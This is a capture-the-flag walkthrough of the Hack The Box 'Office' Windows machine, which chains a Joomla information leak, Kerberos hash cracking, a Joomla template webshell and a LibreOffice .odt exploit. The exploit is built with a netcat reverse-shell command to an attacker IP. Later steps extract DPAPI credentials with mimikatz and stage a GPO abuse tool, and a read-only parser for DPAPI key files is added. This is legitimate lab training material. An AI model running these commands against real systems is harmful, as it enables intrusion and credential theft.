HTB - Office

Machine Info
Office is a hard-difficulty Windows machine featuring various vulnerabilities including Joomla web application abuse, PCAP analysis to identify Kerberos credentials, abusing LibreOffice vulnerability, abusing MSKRP to dump DPAPI credentials and abusing Group Policies due to excessive Active Directory privileges.
Enumeration
Scope
IP Address: 10.10.11.3
Nmap Scan
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Cascade]
└─$ nmap -p- --min-rate 10000 $ip -Pn
PORT STATE SERVICE REASON
53/tcp open domain syn-ack
80/tcp open http syn-ack
139/tcp open netbios-ssn syn-ack
443/tcp open https syn-ack
445/tcp open microsoft-ds syn-ack
593/tcp open http-rpc-epmap syn-ack
3268/tcp open globalcatLDAP syn-ack
3269/tcp open globalcatLDAPssl syn-ack
5985/tcp open wsman syn-ack
9389/tcp open adws syn-ack
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Cascade]
└─$ sudo nmap -sU -p1-10000 --min-rate 10000 $ip -Pn
PORT STATE SERVICE
53/udp open domain
88/udp open kerberos-sec
123/udp open ntp
389/udp open ldap
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Reel2]
└─$ nmap -p53,80,139,443,445,593,3268,3269,5985,9389 -sCV $ip -oN Nmap/script-scan
PORT STATE SERVICE VERSION
53/tcp open domain?
80/tcp open http Apache httpd 2.4.56 ((Win64) OpenSSL/1.1.1t PHP/8.0.28)
|_http-title: Home
|_http-server-header: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.0.28
| http-robots.txt: 16 disallowed entries (15 shown)
| /joomla/administrator/ /administrator/ /api/ /bin/
| /cache/ /cli/ /components/ /includes/ /installation/
|_/language/ /layouts/ /libraries/ /logs/ /modules/ /plugins/
|_http-generator: Joomla! - Open Source Content Management
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
443/tcp open ssl/http Apache httpd 2.4.56 (OpenSSL/1.1.1t PHP/8.0.28)
| ssl-cert: Subject: commonName=localhost
| Not valid before: 2009-11-10T23:48:47
|_Not valid after: 2019-11-08T23:48:47
|_ssl-date: TLS randomness does not represent time
|_http-title: 403 Forbidden
| tls-alpn:
|_ http/1.1
|_http-server-header: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.0.28
445/tcp open microsoft-ds?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: office.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2024-07-14T17:06:42+00:00; +8h00m10s from scanner time.
| ssl-cert: Subject: commonName=DC.office.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC.office.htb
| Not valid before: 2023-05-10T12:36:58
|_Not valid after: 2024-05-09T12:36:58
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: office.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2024-07-14T17:06:43+00:00; +8h00m10s from scanner time.
| ssl-cert: Subject: commonName=DC.office.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC.office.htb
| Not valid before: 2023-05-10T12:36:58
|_Not valid after: 2024-05-09T12:36:58
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
Service Info: Hosts: www.example.com, DC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
| smb2-time:
| date: 2024-07-14T17:06:04
|_ start_date: N/A
|_clock-skew: mean: 8h00m09s, deviation: 0s, median: 8h00m09s
* Open ports: 53,80,139,443,445,593,3268,3269,5985,9389
* UDP open ports: 53,88,123,389
* Services: DNS - HTTP - HTTPS - SMB - KERBEROS - LDAP - winRM
* Versions: Apache httpd 2.4.56 - OpenSSL/1.1.1t - PHP/8.0.28
* Important notes:
http-robots.txt: 16 disallowed entries (15 shown)
http-generator: Joomla! - Open Source Content Management
Domain: office.htb - DNS: DC.office.htb
HTTPS Enumeration
Visiting https://10.10.11.3/ returns a 403 Forbidden message.

SMB Enumeration
Nothing useful found on SMB at this stage.

KERBEROS Enumeration
Found some users with kerbrute using the jsmith.txt wordlist.

Additional users were found when using the xato-10-million wordlist.

I added all the users found to a wordlist and then tried an AS-REP roasting attack, but it failed.

HTTP Enumeration
http://10.10.11.3/
The site runs the Joomla CMS.

I visited http://10.10.11.3/readme.txt to get the version and then searched for CVEs affecting it.
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Office]
└─$ curl -s http://10.10.11.3/readme.txt | grep -i version
* Joomla! 4.2 version history - https://docs.joomla.org/Special:MyLanguage/Joomla_4.2_version_history
<snip>
I found that this version is affected by an unauthenticated information disclosure vulnerability, CVE-2023-23752.

I started Metasploit, searched for an exploit by CVE number and found one.
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Office]
└─$ msfconsole -q
msf6 > search CVE-2023-23752
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 auxiliary/scanner/http/joomla_api_improper_access_checks 2023-02-01 normal Yes Joomla API Improper Access Checks
msf6 > use 0
msf6 auxiliary(scanner/http/joomla_api_improper_access_checks) > options
Name Current Setting Required Description
---- --------------- -------- -----------
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI / yes The URI of the Joomla Application
THREADS 1 yes The number of concurrent threads (max one per host)
VHOST no HTTP server virtual host
msf6 auxiliary(scanner/http/joomla_api_improper_access_checks) > set rhosts 10.10.11.3
msf6 auxiliary(scanner/http/joomla_api_improper_access_checks) > run
[+] Users JSON saved to /home/kali/.msf4/loot/20240714053806_default_10.10.11.3_joomla.users_565355.bin
[+] Joomla Users
============
ID Super User Name Username Email Send Email Register Date Last Visit Date Group Names
-- ---------- ---- -------- ----- ---------- ------------- --------------- -----------
474 * Tony Stark Administrator Administrator@holography.htb 1 2023-04-13 23:27:32 2024-01-24 13:00:47 Super Users
[+] Config JSON saved to /home/kali/.msf4/loot/20240714053806_default_10.10.11.3_joomla.config_217752.bin
[+] Joomla Config
=============
Setting Value
------- -----
db encryption 0
db host localhost
db name joomla_db
db password H0lOgrams4reTakIng0Ver754!
db prefix if2tx_
db user root
dbtype mysqli
[*] Scanned 1 of 1 hosts (100% complete)
We get database credentials:
db host localhost
db name joomla_db
db password H0lOgrams4reTakIng0Ver754!
db user root
Since I have a Joomla username but still don't know its password, I will try the database password against the web login form and against the domain users found earlier.

Let's begin enumerating the domain with these credentials (the database password works for the domain user dwolfe, as the bloodhound-python and crackmapexec output below shows). I will do the following:
Run the BloodHound ingestors
Enumerate the shares
Search for kerberoastable accounts
Run bloodhound.py to collect the data and feed it into the BloodHound GUI
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Office]
└─$ bloodhound-python -u 'dwolfe' -p 'H0lOgrams4reTakIng0Ver754!' -ns $ip -d office.htb -c all
<snip>
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: DC.office.htb
INFO: Done in 00M 21S
Start crackmapexec to view the shares and the permissions on them.

I ran the spider_plus module against the shares to explore their content quickly.
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Office]
└─$ crackmapexec smb $ip -u dwolfe -p 'H0lOgrams4reTakIng0Ver754!' -M spider_plus
SMB 10.10.11.3 445 DC [*] Windows Server 2022 Build 20348 (name:DC) (domain:office.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.3 445 DC [+] office.htb\dwolfe:H0lOgrams4reTakIng0Ver754!
SPIDER_P... 10.10.11.3 445 DC [*] Started spidering plus with option:
SPIDER_P... 10.10.11.3 445 DC [*] DIR: ['print$']
SPIDER_P... 10.10.11.3 445 DC [*] EXT: ['ico', 'lnk']
SPIDER_P... 10.10.11.3 445 DC [*] SIZE: 51200
SPIDER_P... 10.10.11.3 445 DC [*] OUTPUT: /tmp/cme_spider_plus
I found a .pcap file in the SOC Analysis share, so I will download it and examine it locally.
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Office]
└─$ cat /tmp/cme_spider_plus/10.10.11.3.json
<snip>
"SOC Analysis": {
"Latest-System-Dump-8fbc124d.pcap": {
"atime_epoch": "2023-05-07 20:59:54",
"ctime_epoch": "2023-05-07 20:59:54",
"mtime_epoch": "2023-05-10 14:51:42",
"size": "1.31 MB"
}
<snip>
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Office]
└─$ smbclient -U dwolfe \\\\$ip\\'SOC Analysis'
Password for [WORKGROUP\dwolfe]:
smb: \> ls
. D 0 Wed May 10 14:52:24 2023
.. DHS 0 Wed Feb 14 05:18:31 2024
Latest-System-Dump-8fbc124d.pcap A 1372860 Sun May 7 20:59:00 2023
smb: \> get Latest-System-Dump-8fbc124d.pcap
Shell as web_account
Start Wireshark to examine the file.
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Office]
└─$ wireshark Latest-System-Dump-8fbc124d.pcap
After examining the capture in Wireshark, only two packets caught my attention:

The second packet contains the cipher, which is encrypted with the NTLM hash of the user who requested Kerberos pre-authentication, and it also reveals the username: tstark.

Following this post, I can construct the Kerberos hash so that it can be cracked with hashcat. The format is:
$<kerberos 5 pre-auth>$<encryption type>$<username>$<domain-name>$<cipher>
$krb5pa$18$tstark$OFFICE.HTB$a16f4806da05760af63c566d566f071c5bb35d0a414459417613a9d67932a6735704d0832767af226aaa7360338a34746a00a3765386f5fc
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Office]
└─$ hashcat -m 19900 kerberos.hash /usr/share/wordlists/rockyou.txt
<snip>
$krb5pa$18$tstark$office.htb$a16f4806da05760af63c566d566f071c5bb35d0a414459417613a9d67932a6735704d0832767af226aaa7360338a34746a00a3765386f5fc:playboy69
Session..........: hashcat
Status...........: Cracked
I tried this password on the Joomla admin panel as Administrator, because the CVE output showed that the Administrator account belongs to Tony Stark.

Following the steps from HackTricks (editing a template file of the admin theme), I added a webshell and got RCE on the system.

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Office]
└─$ curl -s http://$ip/administrator/templates/atum/error.php?cmd=whoami
office\web_account
I will upgrade the webshell to p0wny.php to be more flexible.

I didn't find anything useful in the context of web_account, as its home directory is empty, so I uploaded RunasCs.exe to get a shell as tstark.
Shell as tstark
.\RunasCs.exe tstark playboy69 PowerShell -r 10.10.16.7:4444
[+] Running in session 0 with process function CreateProcessWithLogonW()
[+] Using Station\Desktop: Service-0x0-9b0db$\Default
[+] Async process 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' with pid 5748 created in background.
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Office]
└─$ rlwrap nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.10.16.7] from (UNKNOWN) [10.10.11.3] 61764
PS C:\Windows\system32> whoami
office\tstark
PS C:\Users\tstark> type Desktop\user.txt
fc7d5bd1f9cf6a3c6xxxxxxxxxxxxxxx
User Flag: fc7d5bd1f9cf6a3c6cxxxxxxxxxxxxxxx
Shell as ppotts
Looking at the listening ports, there is a non-standard port listening.

Looking for the process bound to this port revealed that it is a web server:
PS C:\xampp\htdocs\internal> tasklist /svc | findstr 4024
httpd.exe 4024 Apache2.4
I uploaded Chisel to the machine and forwarded this port to my Kali machine.
On Kali, run:
./chisel_1.9.1_linux_amd64 server -p 8443 --reverse
On the Windows box, run:
.\c.exe client 10.10.16.7:8443 R:8083:localhost:8083
http://localhost:8083/resume.php

The web app doesn't accept any file extension except these four: Doc, Docx, Docm, Odt.
After I uploaded a file.odt to the web app, it appeared in the applications folder under xampp\htdocs\internal with a different name.
Note: no .odt file was there before I uploaded mine!
PS C:\xampp\htdocs\internal> dir applications
Directory: C:\xampp\htdocs\internal\applications
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 7/14/2024 4:13 PM 20321 john-it-30-000-0-5-years-john@htb-com.doc
-a---- 7/14/2024 5:01 PM 0 john-it-30-000-0-5-years-john@htb-com.odt
Checking its permissions, the user ppotts has full access to it.
PS C:\xampp\htdocs\internal> icacls applications
icacls applications
applications CREATOR OWNER:(OI)(CI)(IO)(F)
OFFICE\PPotts:(OI)(CI)(NP)(F)
NT AUTHORITY\SYSTEM:(OI)(CI)(F)
NT AUTHORITY\LOCAL SERVICE:(OI)(CI)(F)
OFFICE\web_account:(OI)(CI)(RX,W)
BUILTIN\Administrators:(OI)(CI)(F)
BUILTIN\Users:(OI)(CI)(RX)
The community said there is a CVE affecting LibreOffice (CVE-2023-2255) that can be used to create a .odt file and get RCE from it.
┌──(kali㉿kali)-[~/…/HTB/machines/Office/CVE-2023-2255]
└─$ python3 CVE-2023-2255.py --cmd 'C:\Users\Public\nc.exe 10.10.16.7 8888 -e PowerShell' --output 'exploit.odt'
File exploit.odt has been created !
Upload the exploit via the web app.

Get a shell as ppotts:
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Office]
└─$ rlwrap nc -lvnp 8888
listening on [any] 8888 ...
connect to [10.10.16.7] from (UNKNOWN) [10.10.11.3] 62159
Windows PowerShell
PS C:\Program Files\LibreOffice 5\program> whoami
office\ppotts
There is a job_offering.ps1 in the Music directory that is responsible for triggering the exploit:
PS C:\Users\PPotts> type Music\job_offering.ps1
# Specify the path to the directory containing ODT files
$directoryPath = "C:\xampp\htdocs\internal\applications"
# Get all ODT files in the directory
$odtFiles = Get-ChildItem -Path $directoryPath -Filter *.odt
foreach ($odtFile in $odtFiles) {
    $newFileName = $odtFile.BaseName + "_resume" + $odtFile.Extension
    $destination = Join-Path -Path "c:\xampp\htdocs\internal\applications\" -ChildPath $newFileName
    Copy-Item -Path $odtFile.FullName -Destination $destination -Force
    del C:\xampp\htdocs\internal\applications\$odtFile
}
$odtFiles = Get-ChildItem -Path $directoryPath -Filter *.odt
# Array to store LibreOffice process IDs
$libreOfficeProcessIds = @()
foreach ($odtFile in $odtFiles) {
    # Start LibreOffice to open the ODT file
    Start-Process "C:\Program Files\LibreOffice 5\program\soffice.exe" -ArgumentList "--headless", "--invisible", "--nologo", "--norestore", "--accept=uno:socket,host=localhost,port=8100;urp;StarOffice.ServiceManager", $odtFile.FullName -PassThru | ForEach-Object {
        # Store the process ID for later termination
        $libreOfficeProcessIds = $_.Id
    }
    # Add a delay (adjust as needed) to ensure LibreOffice has enough time to open the file
    Start-Sleep -Seconds 7
    # Wait for LibreOffice processes to finish opening files and then terminate them
    Stop-Process -Id $libreOfficeProcessIds -Force
    # Add a delay (adjust as needed) to ensure LibreOffice has enough time to open the file
    Start-Sleep -Seconds 5
}
Get-ChildItem -Path "c:\xampp\htdocs\internal\applications\" -Force | Remove-Item -Force
# Put the MacroSecurityLevel key back to its original value
reg.exe add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\LibreOffice\org.openoffice.Office.Common\Security\Scripting\MacroSecurityLevel" /v "Value" /t REG_DWORD /d 3 /f
Shell as hhogan
There are stored credentials for hhogan in the ppotts user session:
PS C:\Users\PPotts> cmdkey /list
Currently stored credentials:
Target: LegacyGeneric:target=MyTarget
Type: Generic
User: MyUser
Target: Domain:interactive=office\hhogan
Type: Domain Password
User: office\hhogan
When I tried to execute commands as that user, it asked for a password:
PS C:\Users\PPotts> runas /savecred /user:office\hhogan whoami
Enter the password for office\hhogan:
Looking at BloodHound, the user hhogan is a member of GPO MANAGERS, which has the ability to add Group Policy Objects; this can be abused to perform malicious actions.


As we don't know hhogan's password, we can extract it by decrypting the DPAPI-protected credential. We need the master key and the credential files, which are located by default in <user>\AppData\Roaming\Microsoft\Credentials and <user>\AppData\Roaming\Microsoft\Protect\<user-sid>\<GUID>.
Credential files
PS C:\Users\PPotts> ls -Force AppData\Roaming\Microsoft\Credentials
Directory: C:\Users\PPotts\AppData\Roaming\Microsoft\Credentials
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a-hs- 5/9/2023 2:08 PM 358 18A1927A997A794B65E9849883AC3F3E
-a-hs- 5/9/2023 4:03 PM 398 84F1CAEEBF466550F4967858F9353FB4
-a-hs- 7/14/2024 5:18 PM 374 E76CCA3670CD9BB98DF79E0A8D176F1E
Master keys
PS C:\Users\PPotts> ls -Force AppData\Roaming\Microsoft\Protect\S-1-5-21-1199398058-4196589450-691661856-1107\
Directory: C:\Users\PPotts\AppData\Roaming\Microsoft\Protect\S-1-5-21-1199398058-4196589450-691661856-1107
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a-hs- 1/17/2024 3:43 PM 740 10811601-0fa9-43c2-97e5-9bef8471fc7d
-a-hs- 5/2/2023 4:13 PM 740 191d3f9d-7959-4b4d-a520-a444853c47eb
-a-hs- 7/14/2024 10:00 AM 740 5f692621-38e9-43bb-ad87-e3ff40ab2720
I uploaded mimikatz.exe and began to extract them.
We must provide a password for the command below, but there is a post from SpecterOps that says it can be done without a password: just provide the /rpc option to mimikatz.
https://posts.specterops.io/operational-guidance-for-offensive-user-dpapi-abuse-1fb7fac8b107
.\mimikatz.exe "dpapi::masterkey /in:C:\Users\PPotts\AppData\Roaming\Microsoft\Protect\S-1-5-21-1199398058-4196589450-691661856-1107\191d3f9d-7959-4b4d-a520-a444853c47eb /sid:S-1-5-21-1199398058-4196589450-691661856-1107 /rpc" exit
.#####. mimikatz 2.2.0 (x64) #19041 Aug 10 2021 17:19:53
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
## \ / ## > https://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )
'#####' > https://pingcastle.com / https://mysmartlogon.com ***/
mimikatz(commandline) # dpapi::masterkey /in:C:\Users\PPotts\AppData\Roaming\Microsoft\Protect\S-1-5-21-1199398058-4196589450-691661856-1107\191d3f9d-7959-4b4d-a520-a444853c47eb /sid:S-1-5-21-1199398058-4196589450-691661856-1107 /rpc
**MASTERKEYS**
dwVersion : 00000002 - 2
szGuid : {191d3f9d-7959-4b4d-a520-a444853c47eb}
dwFlags : 00000000 - 0
dwMasterKeyLen : 00000088 - 136
dwBackupKeyLen : 00000068 - 104
dwCredHistLen : 00000000 - 0
dwDomainKeyLen : 00000174 - 372
[masterkey]
**MASTERKEY**
dwVersion : 00000002 - 2
salt : c521daa0857ee4fa6e4246266081e94c
rounds : 00004650 - 18000
algHash : 00008009 - 32777 (CALG_HMAC)
algCrypt : 00006603 - 26115 (CALG_3DES)
pbKey : 1107e1ab3e107528a73a2dafc0a2db28de1ea0a07e92cff03a935635013435d75e41797f612903d6eea41a8fc4f7ebe8d2fbecb0c74cdebb1e7df3c692682a066faa3edf107792d116584625cc97f0094384a5be811e9d5ce84e5f032704330609171c973008d84f
[backupkey]
**MASTERKEY**
dwVersion : 00000002 - 2
salt : a2741b13d7261697be4241ebbe05098a
rounds : 00004650 - 18000
algHash : 00008009 - 32777 (CALG_HMAC)
algCrypt : 00006603 - 26115 (CALG_3DES)
pbKey : 21bf24763fbb1400010c08fccc5423fe7da8190c61d3006f2d5efd5ea586f463116805692bae637b2ab548828b3afb9313edc715edd11dc21143f4ce91f4f67afe987005320d3209
[domainkey]
**DOMAINKEY**
dwVersion : 00000002 - 2
dwSecretLen : 00000100 - 256
dwAccesscheckLen : 00000058 - 88
guidMasterKey : {e523832a-e126-4d6e-ac04-ed10da72b32f}
pbSecret : <snip>
pbAccesscheck : 1430b9a3c4ab2e9d5f61dd6c62aab8e1742338623f08461fe991cccd5b3e4621d4c8e322650460181967c409c20efcf02e8936c007f7a506566d66ba57448aa8c3524f0b9cf881afcbb80c9d8c341026f3d45382f63f8665
[backupkey] without DPAPI_SYSTEM:
key : 4d1b2c18baba7442e79d33cc771bf54027ae2500e08da3ecfccf91303bd471b6
sha1: eeb787c4259e3c8b8408201ee5e54fc29fad22b2
[domainkey] with RPC
[DC] 'office.htb' will be the domain
[DC] 'DC.office.htb' will be the DC server
key : 87eedae4c65e0db47fcbc3e7e337c4cce621157863702adc224caf2eedcfbdbaadde99ec95413e18b0965dcac70344ed9848cd04f3b9491c336c4bde4d1d8166
sha1: 85285eb368befb1670633b05ce58ca4d75c73c77
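The mimikatz output above prints the master key file section by section (file header, [masterkey], [backupkey], [domainkey]). As an added example, which is my code and not the writeup's or mimikatz's, here is a read-only Python parser for that on-disk layout. The offsets it uses (a 128-byte file header, a 32-byte header on each key block, a 28-byte header on the domain key block) are the example's assumption about the format, and the sample file it builds is constructed from the GUID, salts, round counts, algorithm ids and section lengths shown above, with zero filler in place of the key material. Nothing in it decrypts anything.

```python
# Added example (not part of the original writeup): a read-only parser for the on-disk
# layout of a DPAPI master key file, the kind mimikatz's dpapi::masterkey prints above.
# The field offsets (128-byte file header, 32-byte key block header, 28-byte domain key
# header) are this example's assumption about the format; nothing here decrypts anything.
import struct
import uuid

# dwVersion, reserved, szGuid (36 UTF-16LE chars), reserved, dwFlags,
# then dwMasterKeyLen / dwBackupKeyLen / dwCredHistLen / dwDomainKeyLen
HEADER = struct.Struct("<L8s72s8sLQQQQ")
KEY_HDR = struct.Struct("<L16sLLL")      # dwVersion, salt, rounds, algHash, algCrypt; pbKey follows
DOMKEY_HDR = struct.Struct("<LLL16s")    # dwVersion, dwSecretLen, dwAccesscheckLen, guidMasterKey

ALG_NAMES = {0x8009: "CALG_HMAC", 0x6603: "CALG_3DES", 0x8004: "CALG_SHA1",
             0x800E: "CALG_SHA_512", 0x6610: "CALG_AES_256"}


def parse_key_block(blob):
    """Parse one [masterkey]/[backupkey] block: metadata plus the length of the wrapped key."""
    if len(blob) < KEY_HDR.size:
        raise ValueError("key block shorter than its header")
    version, salt, rounds, alg_hash, alg_crypt = KEY_HDR.unpack_from(blob)
    return {"version": version, "salt": salt.hex(), "rounds": rounds,
            "algHash": ALG_NAMES.get(alg_hash, hex(alg_hash)),
            "algCrypt": ALG_NAMES.get(alg_crypt, hex(alg_crypt)),
            "pbKey_len": len(blob) - KEY_HDR.size}


def parse_domain_key(blob):
    """Parse the [domainkey] block and check its two declared lengths against the block size."""
    if len(blob) < DOMKEY_HDR.size:
        raise ValueError("domain key block shorter than its header")
    version, secret_len, check_len, guid = DOMKEY_HDR.unpack_from(blob)
    if len(blob) - DOMKEY_HDR.size != secret_len + check_len:
        raise ValueError("domain key lengths do not match the block size")
    return {"version": version, "guidMasterKey": str(uuid.UUID(bytes_le=guid)),
            "secret_len": secret_len, "accesscheck_len": check_len}


def parse_masterkey_file(data):
    """Split a master key file into its sections and decode the metadata of each."""
    if len(data) < HEADER.size:
        raise ValueError("file shorter than the master key header")
    version, _, guid_utf16, _, flags, mk_len, bk_len, ch_len, dk_len = HEADER.unpack_from(data)
    if version != 2:
        raise ValueError(f"unexpected dwVersion {version}")
    lengths = {"masterkey": mk_len, "backupkey": bk_len, "credhist": ch_len, "domainkey": dk_len}
    expected = HEADER.size + sum(lengths.values())
    if len(data) != expected:
        raise ValueError(f"sections declare {expected} bytes but the file has {len(data)}")
    info = {"version": version, "guid": guid_utf16.decode("utf-16-le"),
            "flags": flags, "lengths": lengths}
    offset = HEADER.size
    for name, length in lengths.items():
        blob = data[offset:offset + length]
        offset += length
        if length == 0:
            continue                       # e.g. an empty CREDHIST section
        if name in ("masterkey", "backupkey"):
            info[name] = parse_key_block(blob)
        elif name == "domainkey":
            info[name] = parse_domain_key(blob)
    return info


def build_sample_file():
    """Constructed sample, not a real key file: the GUID, salts, round counts, algorithm ids
    and section lengths copy the mimikatz output above; all key material is zero filler."""
    guid = "191d3f9d-7959-4b4d-a520-a444853c47eb"
    mk = KEY_HDR.pack(2, bytes.fromhex("c521daa0857ee4fa6e4246266081e94c"),
                      18000, 0x8009, 0x6603) + bytes(104)
    bk = KEY_HDR.pack(2, bytes.fromhex("a2741b13d7261697be4241ebbe05098a"),
                      18000, 0x8009, 0x6603) + bytes(72)
    dk = DOMKEY_HDR.pack(2, 256, 88,
                         uuid.UUID("e523832a-e126-4d6e-ac04-ed10da72b32f").bytes_le) + bytes(256 + 88)
    header = HEADER.pack(2, bytes(8), guid.encode("utf-16-le"), bytes(8), 0,
                         len(mk), len(bk), 0, len(dk))
    return header + mk + bk + dk


if __name__ == "__main__":
    for key, value in parse_masterkey_file(build_sample_file()).items():
        print(f"{key:>10}: {value}")
```

A useful consistency check falls out of this: with a 128-byte header, the four section lengths mimikatz reports (136 + 104 + 0 + 372) sum to exactly the 740 bytes shown for this file in the directory listing earlier, which is what the length check in parse_masterkey_file enforces. For triage, a parser like this tells you which master key GUID a credential blob references (guidMasterKey in the dpapi::cred output further down) and whether a domain backup key section is present, without handling any key material.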
Try all three credential files until you get the password:
.\mimikatz.exe "dpapi::cred /in:C:\Users\PPotts\AppData\Roaming\Microsoft\Credentials\84F1CAEEBF466550F4967858F9353FB4 /masterkey:87eedae4c65e0db47fcbc3e7e337c4cce621157863702adc224caf2eedcfbdbaadde99ec95413e18b0965dcac70344ed9848cd04f3b9491c336c4bde4d1d8166" exit
.#####. mimikatz 2.2.0 (x64) #19041 Aug 10 2021 17:19:53
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
## \ / ## > https://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )
'#####' > https://pingcastle.com / https://mysmartlogon.com ***/
mimikatz(commandline) # dpapi::cred /in:C:\Users\PPotts\AppData\Roaming\Microsoft\Credentials\84F1CAEEBF466550F4967858F9353FB4 /masterkey:87eedae4c65e0db47fcbc3e7e337c4cce621157863702adc224caf2eedcfbdbaadde99ec95413e18b0965dcac70344ed9848cd04f3b9491c336c4bde4d1d8166
**BLOB**
dwVersion : 00000001 - 1
guidProvider : {df9d8cd0-1501-11d1-8c7a-00c04fc297eb}
dwMasterKeyVersion : 00000001 - 1
guidMasterKey : {191d3f9d-7959-4b4d-a520-a444853c47eb}
dwFlags : 20000000 - 536870912 (system ; )
dwDescriptionLen : 0000003a - 58
szDescription : Enterprise Credential Data
algCrypt : 00006603 - 26115 (CALG_3DES)
dwAlgCryptLen : 000000c0 - 192
dwSaltLen : 00000010 - 16
pbSalt : 649c4466d5d647dd2c595f4e43fb7e1d
dwHmacKeyLen : 00000000 - 0
pbHmackKey :
algHash : 00008004 - 32772 (CALG_SHA1)
dwAlgHashLen : 000000a0 - 160
dwHmac2KeyLen : 00000010 - 16
pbHmack2Key : 32e88dfd1927fdef0ede5abf2c024e3a
dwDataLen : 000000c0 - 192
pbData : f73b168ecbad599e5ca202cf9ff719ace31cc92423a28aff5838d7063de5cccd4ca86bfb2950391284b26a34b0eff2dbc9799bdd726df9fad9cb284bacd7f1ccbba0fe140ac16264896a810e80cac3b68f82c80347c4deaf682c2f4d3be1de025f0a68988fa9d633de943f7b809f35a141149ac748bb415990fb6ea95ef49bd561eb39358d1092aef3bbcc7d5f5f20bab8d3e395350c711d39dbe7c29d49a5328975aa6fd5267b39cf22ed1f9b933e2b8145d66a5a370dcf76de2acdf549fc97
dwSignLen : 00000014 - 20
pbSign : 21bfb22ca38e0a802e38065458cecef00b450976
Decrypting Credential:
* masterkey : 87eedae4c65e0db47fcbc3e7e337c4cce621157863702adc224caf2eedcfbdbaadde99ec95413e18b0965dcac70344ed9848cd04f3b9491c336c4bde4d1d8166
**CREDENTIAL**
credFlags : 00000030 - 48
credSize : 000000be - 190
credUnk0 : 00000000 - 0
Type : 00000002 - 2 - domain_password
Flags : 00000000 - 0
LastWritten : 5/9/2023 11:03:21 PM
unkFlagsOrSize : 00000018 - 24
Persist : 00000003 - 3 - enterprise
AttributeCount : 00000000 - 0
unk0 : 00000000 - 0
unk1 : 00000000 - 0
TargetName : Domain:interactive=OFFICE\HHogan
UnkData : (null)
Comment : (null)
TargetAlias : (null)
UserName : OFFICE\HHogan
CredentialBlob : H4ppyxxxxxx
Attributes : 0
Checking the validity of the credentials and whether they allow remote access to the machine:
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Office]
└─$ crackmapexec smb $ip -u HHogan -p 'H4ppyxxxxxx'
SMB 10.10.11.3 445 DC [+] office.htb\HHogan:H4ppyxxxxxx
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Office]
└─$ crackmapexec winrm $ip -u HHogan -p 'H4ppyxxxxxx'
WINRM 10.10.11.3 5985 DC [+] office.htb\HHogan:H4ppyFtW183# (Pwn3d!)
Access the machine as hhogan:
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Office]
└─$ evil-winrm -i $ip -u HHogan -p 'H4ppyxxxxxxx'
*Evil-WinRM* PS C:\Users\HHogan\Documents>
I didn't know any tools to abuse GPOs, as I hadn't performed this attack before, so I searched online and found SharpGPOAbuse.
*Evil-WinRM* PS C:\Users\HHogan\Documents> upload SharpGPOAbuse.exe
Info: Upload successful!
The GitHub repo also shows how to use it.

I will use --AddLocalAdmin; here are its options:
Options required to add a new local admin:
--UserAccount
Set the name of the account to be added in local admins.
--GPOName
The name of the vulnerable GPO.
Example:
SharpGPOAbuse.exe --AddLocalAdmin --UserAccount bob.smith --GPOName "Vulnerable GPO"
*Evil-WinRM* PS C:\Users\HHogan\Documents> Get-GPO -All | Select-Object DisplayName
DisplayName
-----------
Windows Firewall GPO
Default Domain Policy
Default Active Directory Settings GPO
Default Domain Controllers Policy
Windows Update GPO
Windows Update Domain Policy
Software Installation GPO
Password Policy GPO
